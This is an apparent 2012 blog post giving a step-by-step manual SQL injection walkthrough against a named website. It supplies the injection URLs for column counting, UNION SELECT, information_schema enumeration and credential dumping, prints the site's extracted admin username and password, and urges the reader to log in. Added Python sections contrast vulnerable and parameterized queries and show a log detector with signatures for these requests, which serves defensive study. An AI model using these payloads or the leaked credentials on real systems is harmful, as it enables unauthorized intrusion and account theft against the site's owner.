Tuesday, August 28, 2012

Manual SQL Injection Tutorial




Target:  http://www.natoleo.com/Content.php?id=14
1. Check for the bug by appending a single quote (') to the URL. On http://www.natoleo.com this produces the error:
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc' at line 1)

2. Next, find the number of columns with order by. Start with order by 1, then 2, and so on until an error appears. Here the error appears at 6: MySQL Error: 1054 (Unknown column '6' in 'order clause')
http://www.natoleo.com/Content.php?id=14 order by 5 -
so the number of columns is 6-1 = 5 (5 columns in total)

3. Next find the "magic number", the column whose value is displayed on the page, with union all select. Do not forget to put a minus sign (-) in front of the id value, so id=14 becomes id=-14.
http://www.natoleo.com/Content.php?id=-14 union all select 1,2,3,4,5 -
The "magic number" that appears is 1.

4. Next find the MySQL version by placing version() in position 1.
http://www.natoleo.com/Content.php?id=-14 union all select version(),2,3,4,5 -
The page shows: 5.0.51a-community
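As an added illustration of what steps 1 to 4 rely on (this is not code from the original post), the following Python example rebuilds the pattern with an in-memory SQLite database standing in for MySQL: one lookup concatenates the id parameter into the query, so an ORDER BY or UNION clause in the parameter runs as SQL; the other validates the type and binds the value, so the same input is rejected. The table, its rows, the function names and the probe string are all constructed assumptions, and sqlite_version() stands in for MySQL's version().

```python
import sqlite3

# Constructed stand-in for the Content.php backend (assumption: a table with
# an integer id, a title and a body; not the site's real schema).
SCHEMA = """
CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
INSERT INTO content VALUES (14, 'Welcome', 'Public page text');
"""


def make_db():
    """Build an in-memory SQLite database with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, raw_id):
    """Concatenate the request parameter into the statement.

    This is the pattern the tutorial exploits: whatever follows the number
    is parsed as SQL, so ORDER BY and UNION clauses run as written.
    """
    sql = "SELECT title, body FROM content WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_bound_only(conn, raw_id):
    """Parameter binding without type validation.

    Binding alone already keeps the input from being interpreted as SQL:
    the whole string is compared with the id column as a value.
    """
    return conn.execute(
        "SELECT title, body FROM content WHERE id = ?", (raw_id,)
    ).fetchall()


def lookup_hardened(conn, raw_id):
    """Validate the type first, then bind the value as a parameter.

    int() raises ValueError for anything that is not a plain integer, so
    the request can be rejected (and logged) before any query is built.
    """
    id_value = int(raw_id)
    return conn.execute(
        "SELECT title, body FROM content WHERE id = ?", (id_value,)
    ).fetchall()


# Same two-column shape as the page's "union all select" step, with
# sqlite_version() in place of MySQL's version(); a constructed input.
PROBE = "-14 union all select sqlite_version(), 2 --"


def demo():
    """Run the probe through all three lookups and return what each did."""
    conn = make_db()
    leaked = lookup_vulnerable(conn, PROBE)   # attacker controls the result row
    bound = lookup_bound_only(conn, PROBE)    # [] : compared as data, no match
    try:
        lookup_hardened(conn, PROBE)
        rejected = False
    except ValueError:
        rejected = True                        # never reaches the database
    return leaked, bound, rejected


if __name__ == "__main__":
    leaked, bound, rejected = demo()
    print("vulnerable:", leaked)
    print("bound only:", bound)
    print("validated :", "rejected" if rejected else "accepted")
```

The binding-only variant is included to show that the fix does not depend on blacklisting keywords: once the value is passed as a parameter, the engine never parses it. Validating the type on top of that gives the application a clean point at which to refuse and log the request.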

5. Next find the tables by placing group_concat(table_name) in the magic-number position and "from information_schema.tables where table_schema=database() -" after the 5.
http://www.natoleo.com/Content.php?id=-14 union all select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database() -
The table names appear:

6. Next look for the columns of the table that holds the user and password data. Here we take the table "members". First convert the name to hex so the server can read it without quotes, using http://home.paulschou.net/tools/xlate/ : type members into the ASCII text box and click encode; the Hex Value column gives 6D656D62657273.
Then place group_concat(COLUMN_NAME) in magic position 1 and "from information_schema.columns where table_name=0xHEX -" at the end of the URL, with HEX being 6D656D62657273.
Add 0x in front of the hex so the server knows the value has been converted to hex.
http://www.natoleo.com/Content.php?id=-14 union all select group_concat(COLUMN_NAME),2,3,4,5 from information_schema.columns where table_name=0x6D656D62657273 -
The columns appear:
We take: member_login, member_password

7. To view the contents of the two columns use group_concat(COLUMN1,0x3a,COLUMN2) in magic position 1 and "from TABLENAME -" at the end of the URL.
Replace COLUMN1 with "member_login" and COLUMN2 with "member_password". 0x3a is a colon (:) converted to hex. TABLENAME is replaced with "members" to retrieve the data from the table named "members".

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(member_login,0x3a,member_password),2,3,4,5 from members -
The result appears:
user:  wilmarnatoleo
pass:  natoleoP @ ssword
Now just log in to the website :)
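From the defending side, every request in steps 1 to 7 leaves a distinctive query string in the web server's access log: a stray quote, "order by N", "union all select", "information_schema", "group_concat" and long 0x hex literals. The following Python example, added here and not part of the original post, URL-decodes the query string of each access log line and matches it against signatures for those request shapes, then ranks source addresses by how many signatures they tripped. The log lines are constructed, and the rule names and the threshold are my own choices.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signatures for the request shapes used in the walkthrough, applied to the
# URL-decoded query string (case-insensitive). Names are constructed.
RULES = {
    "quote_probe": re.compile(r"'"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
}

# Constructed Apache-style access log lines (not from any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [28/Aug/2012:10:01:02 +0000] "GET /Content.php?id=14 HTTP/1.1" 200 5120
203.0.113.5 - - [28/Aug/2012:10:01:09 +0000] "GET /Content.php?id=14' HTTP/1.1" 200 812
203.0.113.5 - - [28/Aug/2012:10:01:31 +0000] "GET /Content.php?id=14%20order%20by%206%20-- HTTP/1.1" 200 790
203.0.113.5 - - [28/Aug/2012:10:02:10 +0000] "GET /Content.php?id=-14%20union%20all%20select%20version(),2,3,4,5%20-- HTTP/1.1" 200 4870
203.0.113.5 - - [28/Aug/2012:10:03:44 +0000] "GET /Content.php?id=-14%20union%20all%20select%20group_concat(column_name),2,3,4,5%20from%20information_schema.columns%20where%20table_name=0x6D656D62657273%20-- HTTP/1.1" 200 4901
198.51.100.7 - - [28/Aug/2012:10:04:00 +0000] "GET /Content.php?id=15 HTTP/1.1" 200 5007
"""

# Common log format: ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)


def classify(line):
    """Return (ip, path, [rule names]) for one log line, or None if it
    does not parse as a common-log-format record."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    # Decode %20 and friends so the SQL keywords are visible to the rules.
    decoded = unquote_plus(urlsplit(path).query)
    hits = [name for name, rx in RULES.items() if rx.search(decoded)]
    return m.group("ip"), path, hits


def scan(log_text):
    """Classify every line and keep only those matching at least one rule."""
    findings = []
    for line in log_text.splitlines():
        result = classify(line)
        if result and result[2]:
            findings.append(result)
    return findings


def suspicious_ips(findings, min_hits=2):
    """Source addresses whose rule hits across all lines reach min_hits.

    A single quote probe from a client can be a typo; the same client then
    sending ORDER BY, UNION and information_schema requests is the pattern
    described in the tutorial.
    """
    counts = {}
    for ip, _, hits in findings:
        counts[ip] = counts.get(ip, 0) + len(hits)
    return sorted(ip for ip, n in counts.items() if n >= min_hits)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, path, hits in found:
        print(ip, ", ".join(hits), path)
    print("escalate:", suspicious_ips(found))
```

The rules are deliberately tied to the enumeration sequence rather than to any one keyword: a single hit on a busy site is noise, but a client whose requests walk from a quote probe through ORDER BY, UNION SELECT and information_schema within minutes is worth an alert regardless of whether the responses were 200s.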
